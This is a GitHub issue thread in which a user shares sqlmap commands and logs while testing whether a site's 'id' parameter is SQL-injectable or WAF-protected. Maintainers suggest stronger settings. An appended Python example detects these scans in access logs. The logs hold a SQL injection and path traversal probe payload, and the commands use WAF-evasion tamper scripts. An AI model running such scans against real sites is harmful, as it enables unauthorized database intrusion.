Closed ashee69 closed 9 years ago
Have you tried running --identify-waf?
The new tool itself asks me at the beginning whether to identify the WAF, so I don't think this command can do anything different. Gonna run it again with it.
I've noticed that at the beginning of the run, if it asks, it will almost never "find it", but if you tell it to identify-waf, it will run the scripts and find out which one it is.
NO WAF
[00:05:31] [DEBUG] declared web page charset 'utf-8'
[00:05:31] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[00:05:31] [PAYLOAD] VPyO=5304 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2 NOT BETWEEN 0 AND 1-- ../../../etc/passwd
[00:05:36] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[00:05:36] [DEBUG] checking for WAF/IDS/IPS product 'FortiWeb Web Application Firewall (Fortinet Inc.)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SEnginx (Neusoft Corporation)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Deny All Web Application Firewall (DenyAll)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Varnish FireWall (OWASP) '
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'BIG-IP Application Security Manager (F5 Networks)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Anquanbao Web Application Firewall (Anquanbao)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Sucuri WebSite Firewall'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Yunjiasu Web Application Firewall (Baidu)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Palo Alto Firewall (Palo Alto Networks)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SecureIIS Web Server Security (BeyondTrust)'
[00:05:47] [DEBUG] declared web page charset 'iso-8859-1'
[00:05:47] [DEBUG] got HTTP error code: 501 (Method Not Implemented)
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'BlockDoS'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'EdgeCast WAF (Verizon)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product '360 Web Application Firewall (360)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ExpressionEngine (EllisLab)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Safedog Web Application Firewall (Safedog)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Profense Web Application Firewall (Armorlogic)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'ISA Server (Microsoft)'
[00:05:49] [DEBUG] got HTTP error code: 400 (Bad Request)
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[00:05:50] [DEBUG] page not found (404)
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Airlock (Phion/Ergon)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'UrlScan (Microsoft)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'ASP.NET RequestValidationMode (Microsoft)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'IBM WebSphere DataPower (IBM)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'dotDefender (Applicure Technologies)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[00:05:50] [WARNING] no WAF/IDS/IPS product has been identified
So I continued the test and got this result. My request:
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 -u --dbs --threads=10 --level=2 --risk=2 --skip-urlencode --identify-waf
And the result:
[01:05:23] [WARNING] HTTP error codes detected during run: 400 (Bad Request) - 1 times, 404 (Not Found) - 1 times, 501 (Not Implemented) - 1 times
[01:05:23] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
How did you conclude "NO WAF" from "[00:05:50] [WARNING] no WAF/IDS/IPS product has been identified" ????
Is identification the same as existence???
You have a false positive and now you want to force the target to be injectable. Please don't open any new issues like this one.
Try using --batch --level=3 --risk=3 --random-agent
Hello team, tell me if the target is WAF protected. First I got a false injection this way:
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 2 --force-ssl --threads=10
{1.0-dev-ee11292}
[17:40:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[17:40:41] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:47:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:47:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
And at last I got this:
[17:48:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[17:49:01] [WARNING] false positive or unexploitable injection point detected
[17:49:01] [WARNING] GET parameter 'id' is not injectable
Then I tried some more ways:
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 --force-ssl --dbs --threads=10 --level=5 --risk=3 --technique=T --dbms=mysql
[18:29:38] [WARNING] GET parameter 'id' is not injectable
[18:29:38] [PAYLOAD] sqlmap/1.0-dev-ee11292 (http://sqlmap.org))').,')'("
[18:29:41] [WARNING] heuristic (basic) test shows that User-Agent parameter 'User-Agent' might not be injectable
[18:32:46] [INFO] User-Agent parameter 'User-Agent' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT - comment)' injectable
[18:33:11] [WARNING] false positive or unexploitable injection point detected
[18:33:11] [WARNING] User-Agent parameter 'User-Agent' is not injectable
why parameter 'user-agent' ????
Then I put in all the generally used tamper scripts:
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --flush-session --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
So the result is:
[18:45:56] [WARNING] false positive or unexploitable injection point detected
[18:45:56] [WARNING] GET parameter 'id' is not injectable
[18:45:56] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[18:45:56] [WARNING] HTTP error codes detected during run: 414 (Request-URI Too Long) - 104 times
[18:45:56] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Tried with random-agent:
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --random-agent --flush-session --tamper=between
Not injectable at all:
[20:31:21] [WARNING] GET parameter 'id' is not injectable
Can you tell me some more ways to test, or if it is not injectable? Thank you.
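Seen from the server side, the runs logged in this thread leave three traces: the default `sqlmap/...` User-Agent, the WAF heuristic probe payload, and a burst of 4xx/5xx responses. The following is an added example for defenders, not part of the thread or of sqlmap; the combined access-log format, the sample lines, the `/item.php` path and the error threshold are all assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# URL-encoded form of the [PAYLOAD] probe logged at 00:05:31 in the thread.
PROBE = ("/item.php?id=1&VPyO=5304%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2C"
         "table_name%20FROM%20information_schema.tables%20WHERE%202%20NOT%20BETWEEN%200"
         "%20AND%201--%20..%2F..%2F..%2Fetc%2Fpasswd")
BROWSER = "Mozilla/5.0 (X11; Linux x86_64)"

def _entry(ip, url, status, ua):
    """Build one constructed combined-log line."""
    return f'{ip} - - [01/Jan/2016:00:05:31 +0000] "GET {url} HTTP/1.1" {status} 512 "-" "{ua}"'

# Constructed sample log (documentation IP ranges); not taken from a real server.
SAMPLE_LOG = "\n".join(
    [_entry("203.0.113.7", PROBE, 200, BROWSER)]            # probe sent with a browser-like UA
    + [_entry("203.0.113.7", "/item.php?id=1", 414, BROWSER)] * 3
    + [_entry("198.51.100.9", "/item.php?id=1", 200, "sqlmap/1.0-dev-ee11292 (http://sqlmap.org)"),
       _entry("192.0.2.4", "/index.php", 200, BROWSER),
       _entry("192.0.2.4", "/missing", 404, BROWSER)])

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
UA_RE = re.compile(r"^sqlmap/\S+ \(http://sqlmap\.org\)")
PROBE_RE = re.compile(
    r"union\s+all\s+select.+information_schema\.tables.+\.\./\.\./\.\./etc/passwd", re.I | re.S)

def analyze(log_text, error_threshold=3):
    """Return {client_ip: sorted list of signals} for clients showing any signal."""
    signals, errors = defaultdict(set), Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, url, status, ua = m.groups()
        if UA_RE.search(ua):
            signals[ip].add("sqlmap-ua")      # default UA; absent when --random-agent is used
        if PROBE_RE.search(unquote_plus(url)):
            signals[ip].add("waf-probe")      # SQLi + path traversal in a single parameter
        if status[0] in "45":
            errors[ip] += 1
    for ip, count in errors.items():
        if count >= error_threshold:
            signals[ip].add("error-burst")    # e.g. the 104 x 414 responses in the thread
    return {ip: sorted(found) for ip, found in signals.items()}

if __name__ == "__main__":
    for ip, found in analyze(SAMPLE_LOG).items():
        print(ip, found)
```

Because the User-Agent signal disappears with `--random-agent`, the payload and error-rate signals are the ones to alert on.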